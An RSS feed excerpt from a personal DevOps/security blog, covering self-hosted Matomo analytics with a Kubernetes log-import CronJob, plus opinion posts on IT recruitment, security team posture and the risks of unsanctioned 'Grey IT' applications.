    middlewares:
      - name: security
      - name: redirectscheme
</code></pre><p>We find here 2 blocks, one in HTTP and one in https, with an automatic redirection from one to the other.</p><p>Then, we can see that I assign the DNS record &quot;matomo.tferdinand.net&quot; to this one.</p><p>Finally, I apply the same security patterns that I had described in one of my previous posts.</p><p>I can now apply my 3 configurations.</p><h2 id="configuring-matomo">Configuring Matomo</h2><h3 id="configuring-the-server">Configuring the server</h3><p>By connecting to the address declared in Traefik, you should see the installation wizard.</p><p>It will guide you step by step to :</p><ul><li>Configure your database</li><li>Configure your first administrator user</li><li>Configure your first site</li></ul><p>You can see all the steps below:</p><figure class="kg-card kg-gallery-card kg-width-wide"><div class="kg-gallery-container"><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="https://en.tferdinand.net/content/images/2022/01/1.png" width="1330" height="452" loading="lazy" alt="OpenSource Traefik ratings with Matomo" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/1.png 600w, https://en.tferdinand.net/content/images/size/w1000/2022/01/1.png 1000w, https://en.tferdinand.net/content/images/2022/01/1.png 1330w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://en.tferdinand.net/content/images/2022/01/2.png" width="968" height="855" loading="lazy" alt="OpenSource Traefik ratings with Matomo" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/2.png 600w, https://en.tferdinand.net/content/images/2022/01/2.png 968w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://en.tferdinand.net/content/images/2022/01/3.png" width="1315" height="836" loading="lazy" alt="OpenSource Traefik ratings with Matomo" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/3.png 600w, https://en.tferdinand.net/content/images/size/w1000/2022/01/3.png 1000w, https://en.tferdinand.net/content/images/2022/01/3.png 1315w" sizes="(min-width: 720px) 720px"></div></div><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="https://en.tferdinand.net/content/images/2022/01/4.png" width="1319" height="464" loading="lazy" alt="OpenSource Traefik ratings with Matomo" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/4.png 600w, https://en.tferdinand.net/content/images/size/w1000/2022/01/4.png 1000w, https://en.tferdinand.net/content/images/2022/01/4.png 1319w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://en.tferdinand.net/content/images/2022/01/5.png" width="1319" height="861" loading="lazy" alt="OpenSource Traefik ratings with Matomo" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/5.png 600w, https://en.tferdinand.net/content/images/size/w1000/2022/01/5.png 1000w, https://en.tferdinand.net/content/images/2022/01/5.png 1319w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://en.tferdinand.net/content/images/2022/01/6.png" width="1319" height="744" loading="lazy" alt="OpenSource Traefik ratings with Matomo" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/6.png 600w, https://en.tferdinand.net/content/images/size/w1000/2022/01/6.png 1000w, https://en.tferdinand.net/content/images/2022/01/6.png 1319w" sizes="(min-width: 720px) 720px"></div></div><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="https://en.tferdinand.net/content/images/2022/01/7.png" width="1320" height="1265" loading="lazy" alt="OpenSource Traefik ratings with Matomo" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/7.png 600w, https://en.tferdinand.net/content/images/size/w1000/2022/01/7.png 1000w, https://en.tferdinand.net/content/images/2022/01/7.png 1320w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://en.tferdinand.net/content/images/2022/01/8.png" width="1305" height="1051" loading="lazy" alt="OpenSource Traefik ratings with Matomo" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/8.png 600w, https://en.tferdinand.net/content/images/size/w1000/2022/01/8.png 1000w, https://en.tferdinand.net/content/images/2022/01/8.png 1305w" sizes="(min-width: 720px) 720px"></div></div></div></figure><h3 id="integrate-the-js-tracker">Integrate the js tracker</h3><p>As you could see, Matomo works via a JavaScript tracker to be integrated in your website.</p><p>It is this last one which will interact with the client to give the necessary information.</p><p>To activate Matomo on my site, I just have to integrate this code. In the case of Ghost, my blog, I have a parameter for that in &quot;Code injection&quot; &gt; &quot;Site headers&quot;.</p><p>When you connect to the Matomo interface, you should see some traffic, taking into account that :</p><ul><li>Browsers sending DNT (Do Not Track) header will not send any information (like Brave for example)</li><li>From an RGPD perspective, you must obtain the user&apos;s consent before collecting their information and placing a cookie on their computer. Matomo provides a guide to this (<a href="https://fr.matomo.org/docs/gdpr/?ref=en.tferdinand.net">https://matomo.org/docs/gdpr/</a>).</li></ul><figure class="kg-card kg-image-card"><img src="https://en.tferdinand.net/content/images/2022/01/image-2-1.png" class="kg-image" alt="OpenSource Traefik ratings with Matomo" loading="lazy" width="1000" height="355" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/image-2-1.png 600w, https://en.tferdinand.net/content/images/2022/01/image-2-1.png 1000w" sizes="(min-width: 720px) 720px"></figure><h2 id="to-go-further">To go further</h2><p>It is also possible, as I mentioned above, to couple Matomo to log files.</p><p>There is indeed a python script delivered in the Matomo image which allows you to do this action, starting from known log formats, but also to define custom formats.</p><p>To use this script, there are two prerequisites:</p><ul><li>Python 3.x</li><li>PHP 7.x</li></ul><p>However, the image used above is indeed based on the official PHP image, as can be seen on the GitHub repository, but does not have Python installed.</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://github.com/matomo-org/docker/blob/master/Dockerfile-debian.template?ref=en.tferdinand.net"><div class="kg-bookmark-content"><div class="kg-bookmark-title">docker/Dockerfile-debian.template at master &#xB7; matomo-org/docker</div><div class="kg-bookmark-description">Official Docker project for Matomo Analytics. Contribute to matomo-org/docker development by creating an account on GitHub.</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://github.com/fluidicon.png" alt="OpenSource Traefik ratings with Matomo"><span class="kg-bookmark-author">GitHub</span><span class="kg-bookmark-publisher">matomo-org</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://opengraph.githubassets.com/c71f536666508d2b9724b067e1858fe78bf8ff20e7ccb6e7e2e100bd06037549/matomo-org/docker" alt="OpenSource Traefik ratings with Matomo"></div></a></figure><p>If you want to use this script, there are two solutions:</p><ul><li>Create a custom image for this script with Python and PHP</li><li>Start from the official image by adding PHP, like this</li></ul><pre><code class="language-dockerfile">FROM matomo:4.1.1-apache
RUN apt update -y 
RUN apt install -y python3
RUN apt-get purge -y --auto-remove &amp;&amp; rm -rf /var/lib/apt/lists/*</code></pre><p>The script is then easily usable, as indicated in the official documentation :</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://fr.matomo.org/docs/log-analytics-tool-how-to/?ref=en.tferdinand.net"><div class="kg-bookmark-content"><div class="kg-bookmark-title">How to use Log Analytics tool - Analytics Platform - Matomo</div><div class="kg-bookmark-description"></div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://static.matomo.org/wp-content/uploads/2018/11/cropped-DefaultIcon-270x270.png" alt="OpenSource Traefik ratings with Matomo"><span class="kg-bookmark-author">Analytics Platform - Matomo</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://static.matomo.org/wp-content/uploads/2018/11/feature.png" alt="OpenSource Traefik ratings with Matomo"></div></a></figure><p>Regarding the authentication, three solutions are possible. Either you are in the image that runs the application, and the script will be able to exploit directly the configuration files and thus connect directly.</p><p>The second solution is to create a token which will allow you to authenticate yourself and to pass it in the parameter with the switch --token-auth, this token can be created from the interface of Matomo. To do so, you just have to click on the cog in the top right corner, then &quot;Security&quot; and &quot;Create a new token&quot;.</p><figure class="kg-card kg-image-card"><img src="https://en.tferdinand.net/content/images/2022/01/image-3-1.png" class="kg-image" alt="OpenSource Traefik ratings with Matomo" loading="lazy" width="1000" height="487" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/image-3-1.png 600w, https://en.tferdinand.net/content/images/2022/01/image-3-1.png 1000w" sizes="(min-width: 720px) 720px"></figure><p>Be careful, the token can only be recovered once, so don&apos;t forget to store it in a secure environment.</p><p>Finally, the third solution, which <strong>I strongly advise against</strong>, it is also possible to pass directly a login and password in command line.</p><h2 id="importing-logs-with-a-kubernetes-cronjob">Importing logs with a Kubernetes cronjob</h2><p>For my part, I chose to import the logs by using a Kubernetes cronjob.</p><p>Indeed, I chose not to deploy the javascript that I find too intrusive for you, my visitors. So I chose to analyze the raw logs provided by Traefik.</p><p>I also chose not to use the official image for this purpose and I use a token authentication.</p><h3 id="the-image">The image</h3><p>The docker image I used is quite basic:</p><pre><code class="language-dockerfile">FROM python:3.8.7-buster
RUN apt update\
	&amp;&amp; apt install git \
	&amp;&amp; git clone https://github.com/matomo-org/matomo-log-analytics.git \
	&amp;&amp; rm -rf /var/lib/apt/lists/*
</code></pre><p>I start from a python 3.8 image (because the importer is only compatible with some versions) then I clone the associated repository.</p><p>You can get the image directly created via dockerhub :</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://hub.docker.com/r/tferdinand/matomo-log-importer?ref=en.tferdinand.net"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Docker Hub</div><div class="kg-bookmark-description"></div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://hub.docker.com/favicon.ico" alt="OpenSource Traefik ratings with Matomo"></div></div></a></figure><p>The job<br>I chose to put my Traefik logs in a directory that I can mount when I need it.</p><p>To know more about logs configuration, I invite you to read my article on this subject :</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://en.tferdinand.net/extraction-of-traefik-accesslogs-and-dashboard-creation/"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Extraction of Traefik accesslogs and dashboard creation</div><div class="kg-bookmark-description">A few weeks ago, I wrote an article explaining the migration from Traefik 1 to Traefik 2, but this time I propose to address a crucial point in the implementation of an application, its monitoring. This article explains how I set up my dashboarding, it doesn&#x2019;t explain in any case</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://en.tferdinand.net/favicon.png" alt="OpenSource Traefik ratings with Matomo"><span class="kg-bookmark-author">TFerdinand.net</span><span class="kg-bookmark-publisher">Teddy FERDINAND</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://en.tferdinand.net/content/images/2019/12/traefik_banner2.png" alt="OpenSource Traefik ratings with Matomo"></div></a></figure><p>I then created a Kubernetes cronjob, which will allow me to read the logs at regular intervals to integrate them into Matomo.</p><pre><code class="language-yaml">apiVersion: batch/v1beta1
kind: CronJob
metadata:
  name: matomo-importer
spec:
  schedule: &quot;5 * * * *&quot;
  jobTemplate:
    spec:
      template:
        spec:
          containers:
          - name: matomo-importer
            image: tferdinand/matomo-log-importer:1.0.0
            imagePullPolicy: IfNotPresent
            env:
              - name: PROCESSING_DATE
                value: $(date -d &quot;1 hour ago&quot; &quot;+%d/%b/%Y:%H&quot;)
              - name: TOKEN
                value: &quot;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx&quot;
              - name: TRAEFIK_INGRESS_ID
                value: &quot;default-traefik-web-ui-tls-c463f039d72c55f0aca6&quot;
              - name: ID_SITE
                value: 1
            command:
            - /bin/bash
            - -c
            - grep $(TRAEFIK_INGRESS_ID) /tmp/access.log | grep $(PROCESSING_DATE) &gt; /tmp/matomo_$(ID_SITE).log; python matomo-log-analytics/import_logs.py  --url=https://matomo.tferdinand.net --idsite=$(ID_SITE) --debug --token-auth $(TOKEN) --log-format-name=common /tmp/matomo_$(ID_SITE).log
            volumeMounts:
            - name: shared-storage
              mountPath: /tmp/
          restartPolicy: OnFailure
          volumes:
            - name: shared-storage
              hostPath:
                path: /home/kube/share/from_traefik
                type: Directory
</code></pre><p>So I run this task once an hour, to process the previous hour.</p><p>The &quot;grep&quot; that we see at the beginning allows me to output only the logs for the service I want, the Matomo log importer not knowing how to handle the format of the traefik logs in a more refined way.</p><p>ID_SITE allows me to indicate the site ID on Matomo, by default 1.</p><p>So, every hour, I can follow the site&apos;s traffic, without impacting my users. Note that it is possible to go down to the minute by adjusting the parameters.</p><h2 id="in-conclusion">In conclusion</h2><p>Matomo is a reliable alternative that is more respectful of your users. It is completely possible to consider it in a professional environment.</p><p>If you have a need for more consistent statistics on your site, it is inherently better for your users to use this solution than Google Analytics.</p><p>Moreover, hosting the solution yourself also allows you to respect the constraints more easily related to the RGPD. The openness of the code also guarantees that no third party exploitation of the data is made.</p><p>I also insist on the fact that not all sites need complete tracking, for my part, a simple exploitation of the logs allows me to get consistent data.</p>]]></content:encoded></item><item><title><![CDATA[[IT] Salary is not the only recruitment criteria]]></title><description><![CDATA[<p>Because of my professional background, I&#x2019;ve worked for a lot of companies, either as a service provider or internally.</p><p>Salary is often:</p><ul><li>A taboo subject, you should not talk about the salary you receive and even less with your colleagues</li><li>Seen as the only criterion for recruiting: If</li></ul>]]></description><link>https://en.tferdinand.net/it-salary-is-not-the-only-recruitment-criteria/</link><guid isPermaLink="false">6337ff9a65fbc6000155a56f</guid><category><![CDATA[Point of view]]></category><category><![CDATA[Job]]></category><dc:creator><![CDATA[Teddy FERDINAND]]></dc:creator><pubDate>Mon, 08 Feb 2021 07:07:00 GMT</pubDate><media:content url="https://en.tferdinand.net/content/images/2022/01/Webp.net-compress-image.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://en.tferdinand.net/content/images/2022/01/Webp.net-compress-image.jpg" alt="[IT] Salary is not the only recruitment criteria"><p>Because of my professional background, I&#x2019;ve worked for a lot of companies, either as a service provider or internally.</p><p>Salary is often:</p><ul><li>A taboo subject, you should not talk about the salary you receive and even less with your colleagues</li><li>Seen as the only criterion for recruiting: If we don&#x2019;t recruit, it&#x2019;s because we don&#x2019;t pay enough, if employees leave, it&#x2019;s because of the salary</li></ul><p>Today, I give you my vision on this point.</p><h2 id="the-salary-is-an-important-criterion%E2%80%A6">The salary is an important criterion&#x2026;</h2><p>Like many I think, I work to earn money. To say that salary is not a criterion for choosing a company would be hypocritical on my part.</p><p>Clearly, the salary that a company will offer me is one of the points I look at. However, for me it is only one of the criteria.</p><p>In the past, I had the opportunity to work in many different sectors and sizes of companies:</p><ul><li>retail: Carrefour, Fnac, Conforama</li><li>industry: L&#x2019;Or&#xE9;al</li><li>banking: ING Commercial Banking, Soci&#xE9;t&#xE9; G&#xE9;n&#xE9;rale</li><li>Media: M&#xE9;diam&#xE9;trie, Groupe SeLoger</li></ul><p>All this to say that beside the salary, this panel also allowed me to see the sectors that interest me and what is not for me.</p><p>It is also thanks to this that I understood that I prefer to work in smaller structures than in big multinationals.</p><p>In IT, concerning the salary, you have to keep in mind that you often get a better salary in SSII/ESN. However, you have to keep in mind that this is not necessarily adapted to everyone, the world of service provision is a world that is more &#x201C;mobile&#x201D;, where you change context regularly, it is not necessarily adapted to everyone.</p><h2 id="%E2%80%A6-but-far-from-being-the-only-one">&#x2026; but far from being the only one</h2><p>It is indeed important to be paid according to the work done and the quality of it, that is undeniable.</p><p>However, limiting the choice of a company to the salary it offers is simplistic.</p><h3 id="the-general-atmosphere">The general atmosphere</h3><p>Being in a company with a healthy general atmosphere is just as important. I&#x2019;m not talking about table soccer and croissants, but about a healthy atmosphere for your mind.</p><p>As an anecdote, in one of my former missions, I was shocked by a situation: I was on the client&#x2019;s set surrounded by internal teams, and some people could not communicate other than by insults or aggression, I even saw one person crying on the set! Atmosphere!</p><p>This allowed me to see that this is not what I am looking for, and to tell myself that being in a healthy work environment is essential for me.</p><h3 id="feeling-valued">Feeling valued</h3><p>I am one of those people who believe that in technical positions, it is important that the work you do is valued. We are often &#x201C;men (and women, of course) behind the scenes&#x201D;, and when a project is successful, the technical teams that made it possible are rarely put forward.</p><p>There are several ways to do this for me:</p><ul><li>The salary increase (this seems logical)</li><li>Saying it! (we often forget this detail)</li><li>Share the success, for example by doing communications to explain what the team did</li><li>Highlight it on a technical blog</li></ul><p>The last point is important to me. More and more companies are setting up technical blogs, even if it&#x2019;s not their core business. Why? Because it allows them to highlight the skills they cultivate internally, but not only, a technical blog is also a perfect showcase for recruiting. Be careful, though, it is important that the author is highlighted in these articles, and not necessarily the company (even though the goal is visibility for the company)</p><p>At WeScale, my current employer, this also manifests itself with the WeTribute, once a month, we receive a form through which we can thank several colleagues. Once a quarter, all these thanks are compiled and sent and the three most thanked (excluding management) share a bonus. Being recognized by your peers is important and I must admit that receiving these messages once a quarter is always heartwarming!</p><h3 id="knowing-where-you%E2%80%99re-going">Knowing where you&#x2019;re going</h3><p>The reason I left some companies was the captainless ship syndrome. You know, that feeling that you&#x2019;re sailing with the waves, but no one has set a clear course.</p><p>From my point of view, it&#x2019;s a frustrating situation. I like to know where the company I&#x2019;m in is going. This requires communication: explaining the company&#x2019;s choices, sharing a roadmap (even a very &#x201C;big picture&#x201D; one)&#x2026; Basically, having a clearly defined direction.</p><p>But it also involves a point that is often forgotten: the career plan. I&#x2019;m one of those people who need to be able to project themselves and say &#x201C;OK, if I stay x years in the company, how can I evolve? Personally, I need to know that I won&#x2019;t be doing the same thing every day until I quit.</p><p>Having visibility on possible evolutions is something that is as important as the salary.</p><h3 id="you-are-very-kind-but-how-do-i-recruit">You are very kind, but how do I recruit?</h3><p>I&#x2019;m not an expert in human resources, far from it, it&#x2019;s a job that requires a lot of psychology and empathy and I don&#x2019;t intend to take a position on these subjects.</p><p>However, I am one of those who are on the other side, and I can give my point of view.</p><p>First of all, stop putting forward your table soccer, resting room and co., I am applying for a job, not a summer camp!</p><p>Then, don&#x2019;t only focus on the salary, but on what&#x2019;s around it. I have turned down offers with a 50% increase in salary because the work environment was not for me. Paying a lot of money to people who won&#x2019;t stay because of the work environment actually costs you more (training time, continuous recruitment, team turnover = demotivating, etc.)!</p><p>Some levers like telecommuting for example are nowadays points that can also be interesting.</p><p>Today, it is important to have healthy working conditions to be able to recruit. Don&#x2019;t forget, for the same salary, candidates will always go where they feel most comfortable.</p>]]></content:encoded></item><item><title><![CDATA[For an effective security posture]]></title><description><![CDATA[<p>I&#x2019;ve been working in the IT field for more than 10 years now and I&#x2019;ve worked with a lot of &#x201C;security&#x201D; teams within the companies I&#x2019;ve been in. I&#x2019;ve been a security guy (Cloud Security Architect) for a little over</p>]]></description><link>https://en.tferdinand.net/for-an-effective-security-posture/</link><guid isPermaLink="false">6337ff9a65fbc6000155a56e</guid><category><![CDATA[Security]]></category><category><![CDATA[Point of view]]></category><category><![CDATA[DevOps]]></category><category><![CDATA[Team Building]]></category><dc:creator><![CDATA[Teddy FERDINAND]]></dc:creator><pubDate>Mon, 01 Feb 2021 06:57:00 GMT</pubDate><media:content url="https://en.tferdinand.net/content/images/2022/01/Webp.net-compress-image--2-.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://en.tferdinand.net/content/images/2022/01/Webp.net-compress-image--2-.jpg" alt="For an effective security posture"><p>I&#x2019;ve been working in the IT field for more than 10 years now and I&#x2019;ve worked with a lot of &#x201C;security&#x201D; teams within the companies I&#x2019;ve been in. I&#x2019;ve been a security guy (Cloud Security Architect) for a little over a year now.</p><p>During these years, I often noticed a blocking posture of the security teams, sometimes even disconnected from the field, leading to slowdowns and tensions in the projects.</p><p>Today, I&#x2019;m going to present you the posture I chose to adopt and explain why. I will also give you my point of view with a little hindsight after one year.</p><h2 id="a-little-background">A little background</h2><p>In most of the companies I&#x2019;ve worked for, security is often a mandatory checkpoint, but not necessarily useful or efficient&#x2026; I&#x2019;ll explain.</p><p>Often, this team is called upon at the end of the chain to:</p><ul><li>Perform a penetration test on an infrastructure</li><li>Verify that the deliverable is compliant</li><li>Ask for specifics &#x201C;right passes&#x201D;</li></ul><p>Moreover, we avoid soliciting them as much as possible, because we know that the response time will be long, often in weeks.</p><p>To add another layer, I have often had to deal with people who are disconnected from the reality of the field concerning:</p><ul><li>the maturity of the implementation teams concerning cybersecurity</li><li>tooling</li><li>business needs</li><li>delivery times</li></ul><p>In other words, we often end up with a deaf language, each one not understanding the other.</p><p>When I arrived in my mission, I was in a position where a barrier existed between the dev/ops and security. The former did not understand the interest of the measures being implemented.</p><p>This barrier creates resistance to change and therefore slows down the speed of the teams, in addition to creating a not necessarily pleasant atmosphere.</p><h2 id="coming-down-from-the-ivory-tower">Coming down from the ivory tower</h2><p>One of the major issues, as I mentioned earlier, is the disconnect between the operations (DevOps) teams and security.</p><p>One of the first things I manage to deploy to improve this situation was to organize regular check-ins between myself and the ops.</p><p>In this model, the ops team is an &#x201C;ambassador&#x201D; for security. This doesn&#x2019;t mean that I don&#x2019;t exchange with the development teams, but rather that a SPOC (Single Point Of Contact) must be designated. Humanly speaking, I can&#x2019;t talk directly to 200 people.</p><p>Indeed, the purpose of this point is mainly to be bidirectional. This allows:</p><ul><li>Security can present its roadmap in advance of the phase, by explaining it</li><li>That the teams can bring up their concerns, needs or current blockages as soon as possible</li><li>Generally speaking, this improves communication between entities</li></ul><p>Moreover, taking into account the feedback from the &#x201C;field&#x201D; teams also allows adjusting as much as possible the tools or the security rules that are being implemented.</p><p>Be careful, however, the goal is not to justify the choices, but to explain them. You must therefore be in a pedagogical posture, and not be defensive or defensive.</p><h2 id="zero-trust-%E2%80%A6-yes-but-not-only">Zero trust &#x2026; yes, but not only!</h2><p>I am a fan of the zero trust model (a blog post on the subject is coming soon); however, I am among those who consider it a model, a target to reach, not an immediate objective.</p><p>The concern I have often seen is an inconsistent posture on this subject:</p><ul><li>Hardening too much: we prevent teams from working by putting too strong a technical framework (for example, by not giving any autonomy on a software installation)</li><li>Not being able to adapt a rule if it is too rigid (e.g., network filtering, or an incompatible protocol)</li><li>Being in a blocking mode on a project, preventing any delivery</li></ul><p>My approach is more to say that we need to understand the technical and operational constraints of the teams to see how we can best apply zero trust.</p><p>This means:</p><ul><li>That I sometimes tolerate giving more rights than necessary temporarily to allow projects to progress</li><li>That it is necessary to trust the teams</li><li>That we must show that we are available to answer questions, and that we are in a constructive approach, the goal is to find a solution</li></ul><h2 id="supporting-projects-rather-than-blocking-them">Supporting projects rather than blocking them</h2><p>This is the point I often insist on. In my mind, security is meant to accompany projects as best as possible. The idea is therefore :</p><ul><li>To document upstream as much as possible, so that the information is shared</li><li>To be available to help the teams</li><li>To listen to the needs of the teams</li><li>To have a benevolent approach</li><li>To be in an advisory role rather than a &#x201C;finished work inspector</li></ul><p>You will have understood, I am completely in a DevSecOps approach, which, from my point of view, allows to be efficient.</p><p>Positioning oneself as a coach also saves time, by becoming a full-fledged project actor, it allows to be listened to and to ensure that security needs are taken into account as early as possible in the projects.</p><p>Adopting this posture also allows the teams to become allies rather than adversaries to be fought.</p><p>This also requires a lot of communication, as I often say, a large part of my daily work is to explain and document. The clearer and more available information is, the more the associated rules will be adopted.</p><p>This also means that a CISO must know how to surround himself with technical people in order to best support the teams. As a reminder, the role of CISO is not so much technical as organizational.</p><h2 id="in-conclusion">In conclusion</h2><p>I apply to myself the rules I mentioned earlier, and I must admit that in one year, I have seen the direct benefits:</p><ul><li>I am asked at the beginning of the next ones to see what points of attention I can bring</li><li>Security decisions are understood (not necessarily accepted, but the objective is understood)</li><li>I am no longer seen as a blocking point</li></ul><p>My approach probably comes from my background as an Ops person, which means that I myself have been on the other side of the fence. I am therefore better able to understand the problems that teams in the field may face.</p><p>This does not mean that everything is rosy, there will always be dissatisfied people, but instead of being involved at the end of the chain, I have become an actor in the projects.</p>]]></content:encoded></item><item><title><![CDATA[The danger of Grey IT in companies]]></title><description><![CDATA[<p>Confined spaces have changed our work habits a lot. Telecommuting has become something more common than it was just a year ago.</p><p>With the implementation of telecommuting very quickly, new risks have appeared. Today, I suggest talking about Grey IT.</p><h2 id="what-is-grey-it">What is Grey IT?</h2><p>In a company, in a classical</p>]]></description><link>https://en.tferdinand.net/the-danger-of-grey-it-in-companies/</link><guid isPermaLink="false">6337ff9a65fbc6000155a56d</guid><category><![CDATA[Security]]></category><category><![CDATA[Point of view]]></category><dc:creator><![CDATA[Teddy FERDINAND]]></dc:creator><pubDate>Mon, 18 Jan 2021 07:48:00 GMT</pubDate><media:content url="https://en.tferdinand.net/content/images/2022/01/Webp.net-compress-image--1-.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://en.tferdinand.net/content/images/2022/01/Webp.net-compress-image--1-.jpg" alt="The danger of Grey IT in companies"><p>Confined spaces have changed our work habits a lot. Telecommuting has become something more common than it was just a year ago.</p><p>With the implementation of telecommuting very quickly, new risks have appeared. Today, I suggest talking about Grey IT.</p><h2 id="what-is-grey-it">What is Grey IT?</h2><p>In a company, in a classical way, the applications used are referenced in a service catalog.</p><p>For example, if your company uses Slack, the office service knows it, and will configure this application so that it works with the company&#x2019;s security and confidentiality standards.</p><p>But before the app is even installed, it is first reviewed:</p><ul><li>By legal: The goal here is to check the terms of use, to see if any usage could be detrimental to the company, such as the fact that the information put into the app would become public or no longer belong to your company</li><li>By security: The goal here is to control the compliance of the application with the security standards of your IS. It also means analyzing the code if necessary or launching analyses (malware, known CVEs, etc.).</li><li>Accounting: An application always has a cost, visible or not (I will come back to this point), and it is important to see if this cost is acceptable in relation to your budget, or if the need is not already covered by another application that you already have</li></ul><p>Grey IT is precisely the fact of not following these processes often perceived as restrictive.</p><p>However, their purpose is to secure your business, but from the outside, it can be seen as heavy and slow. Typically, if we take my example of slack, I may have a need that slack does not meet today, like having a whiteboard.</p><p>So, to answer my need, I create a personal Gmail account to use Google Meet and share whiteboards with my colleagues. Don&#x2019;t worry, it&#x2019;s free!</p><h2 id="if-it%E2%80%99s-free-it-means-you-are-the-product">If it&#x2019;s free, it means you are the product</h2><p>My previous example is the case I&#x2019;ve often come across: I have a need, a free product meets it, I take the product.</p><p>But here&#x2019;s the thing: developing professional applications cannot be improvised, and although there are obviously open source solutions hosted by these same communities, this remains on the fringe of many other applications that have the means to be more visible.</p><p>To take Gmail again, Google is not a non-profit organization. Their business is your data, your usage, your habits. It&#x2019;s how Google makes money by offering you a free service.</p><p>For some it will be a &#x201C;freemium&#x201D; model, like Slack which has a free offer, but which quickly shows its limits in business.</p><p>That&#x2019;s why you have to study the business model and the contractual part carefully before choosing an application, because it can sometimes backfire. Providing data about your business to a third party company can :</p><ul><li>Be dangerous (for example in terms of GDPR data)</li><li>Allow this company to exploit this idea for you</li><li>Make this company grow on your workload</li></ul><h2 id="why-is-this-a-danger">Why is this a danger?</h2><p>Using non-referenced applications poses several concerns:</p><ul><li>Creation of parallel IS</li><li>Adding security risks with &#x201C;exotic&#x201D; applications</li><li>Addition of confidentiality risks</li><li>Increasing the overall budget, as several entities may purchase applications with overlapping needs, but on a smaller scale, not benefiting from volume pricing. It also means potentially having multiple applications that meet the same need.</li></ul><p>I can&#x2019;t count the number of times I&#x2019;ve been shown the newest trendy application and upon digging deeper I&#x2019;ve realized that it&#x2019;s trendy but not at all usable in the current business context.</p><p>The most obvious example, in my opinion, is the case of Zoom. This application was a huge success at the beginning of the first containment, because it met real functional needs.</p><p>However, in terms of security, it was a disaster:</p><ul><li>No end-to-end encryption</li><li>Zoom bombing: the invasion of conferences by outsiders who can at best spoil your meeting, at worst remain discreet and do industrial espionage</li><li>Security concerns on user workstations that allow for access rights</li></ul><p>We talked about this last June in the <a href="https://open.spotify.com/episode/3uuY75Lrrht91kN91M6vWn?si=T6nSamQpT2u5LRPkEK4AYA&amp;ref=en.tferdinand.net">WeScale podcast</a> [FR Link]!</p><p>Thus, following a normal company process, it would have been simply refused in many companies (besides Zoom is still banned in many companies); nevertheless, it has been used a lot, because it was exploited without following these processes in order to respond faster to a need.</p><h2 id="to-conclude">To conclude</h2><p>Having new needs is normal in a company. However it is important to follow well-defined processes when adding a new application to your IS.</p><p>This is to secure your business and avoid simply losing value.</p><p>Also, it is important to have an up-to-date inventory of the applications used and available to avoid adding applications when the needs are already covered. Often, the Grey IT cases I saw simply came from there.</p>]]></content:encoded></item><item><title><![CDATA[Create Vagrant boxes easily using Packer]]></title><description><![CDATA[<p>A few months ago, I wrote a post to explain how to easily create a local Kubernetes cluster leveraging Vagrant and Traefik. You can find it here:</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://en.tferdinand.net/create-a-local-kubernetes-cluster-with-vagrant/"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Create a local Kubernetes cluster with Vagrant</div><div class="kg-bookmark-description">Testing Kubernetes is quite easy thanks to solutions such as Minikube. However, when you want to</div></div></a></figure>]]></description><link>https://en.tferdinand.net/create-vagrant-boxes-easily-using-packer/</link><guid isPermaLink="false">6337ff9a65fbc6000155a56c</guid><category><![CDATA[packer]]></category><category><![CDATA[Vagrant]]></category><category><![CDATA[K3S]]></category><category><![CDATA[Traefik]]></category><category><![CDATA[IASC]]></category><dc:creator><![CDATA[Teddy FERDINAND]]></dc:creator><pubDate>Mon, 11 Jan 2021 06:42:00 GMT</pubDate><media:content url="https://en.tferdinand.net/content/images/2022/01/packer.png" medium="image"/><content:encoded><![CDATA[<img src="https://en.tferdinand.net/content/images/2022/01/packer.png" alt="Create Vagrant boxes easily using Packer"><p>A few months ago, I wrote a post to explain how to easily create a local Kubernetes cluster leveraging Vagrant and Traefik. You can find it here:</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://en.tferdinand.net/create-a-local-kubernetes-cluster-with-vagrant/"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Create a local Kubernetes cluster with Vagrant</div><div class="kg-bookmark-description">Testing Kubernetes is quite easy thanks to solutions such as Minikube. However, when you want to test cluster-specific features, such as load balancing or failover, it is not necessarily suitable anymore. It is possible to build your Kubernetes infrastructure on servers, or by using managed services&#x2026;</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://en.tferdinand.net/favicon.png" alt="Create Vagrant boxes easily using Packer"><span class="kg-bookmark-author">TFerdinand.net</span><span class="kg-bookmark-publisher">Teddy FERDINAND</span></div></div><div 